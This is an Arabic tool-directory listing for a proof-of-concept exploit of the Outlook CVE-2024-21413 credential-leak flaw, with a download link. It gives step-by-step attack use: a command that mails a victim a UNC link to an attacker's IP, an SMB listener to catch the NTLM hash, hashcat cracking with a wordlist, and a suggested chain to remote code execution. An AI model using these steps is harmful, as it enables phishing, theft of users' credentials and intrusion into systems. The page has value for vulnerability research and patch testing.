Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-21413 — ثغرة كشف المعلومات في Microsoft Outlook (تسريب تجزئة كلمة المرور) - سكربت Expect لإثبات المفهوم | Kitploit
أدوات/GitHubGitHub/duy-31/cve-2024-21413
كسر كلمات المرورأدوات التصيدتحليل الثغرات الأمنيةالاستغلالالتعلم والتعليمأمان البريد الإلكتروني
GitHubduy-31/cve-2024-21413

CVE-2024-21413

ثغرة كشف المعلومات في Microsoft Outlook (تسريب تجزئة كلمة المرور) - سكربت Expect لإثبات المفهوم

عرض المستودع
15733منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-21413 - سكربت Expect - إثبات الفكرة

ثغرة تسريب بيانات الاعتماد وتنفيذ التعليمات البرمجية عن بُعد في Microsoft Outlook عند دمجها مع CVE-2023-21716 (عبر لوحة المعاينة) CVSS:3.1 9.8 / 8.5

يجب أن يحذرك Outlook من المخاطرة عند فتح رابط خارجي => لكن هذا ليس هو الحال!

صورة

الاستخدام: ./cve-2024-21413.sh mx.fqdn port sender recipient url

./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

ملاحظات: chmod +x cve-2024-21413.sh

يتطلب تطبيق Expect ويتطلب عنوان IP مرسل شرعيًا وبريدًا إلكترونيًا مرسلًا شرعيًا (لاجتياز SPF وDKIM وDMARC)


  • أولاً، شغّل مستمع SMB مثل ذلك

صورة

  • شغّل الـ POC

صورة

  • وانتظر البريد الإلكتروني، وفي نافذة المعاينة انقر على الرابط

صورة

  • بعد ذلك ينبغي أن تسترجع بيانات الدخول والهاش الخاص بالشخص الذي نقر على الرابط (بدون رسالة التحذير في إصدارات Outlook المتأثرة)

    صورة

  • يمكنك بعد ذلك محاولة كسر كلمة المرور باستخدام hashcat. فقط انسخ كل الأسطر التي تحتوي على اسم الدخول إلى ملف وشغّل hashcat مع الوحدة 5600

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

  • يمكنك ربط هذا الـ CVE مع CVE-2023-21716 للحصول على RCE !!!

الفضل: [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]

حل بديل/إصلاح: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]


المزيد عني ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ إخلاء مسؤولية: مهم: هذا السكربت مقدم للأغراض التعليمية والاختبار الأخلاقي والاستخدام القانوني فقط. لا تستخدمه على أي نظام أو شبكة دون إذن صريح. الوصول غير المصرح به إلى أنظمة الكمبيوتر والشبكات غير قانوني، والمستخدمون الذين يُضبطون وهم يقومون بأنشطة غير مصرح بها يخضعون لإجراءات قانونية. المؤلف غير مسؤول عن أي ضرر ناتج عن سوء استخدام هذا السكربت.

تنزيل الأداة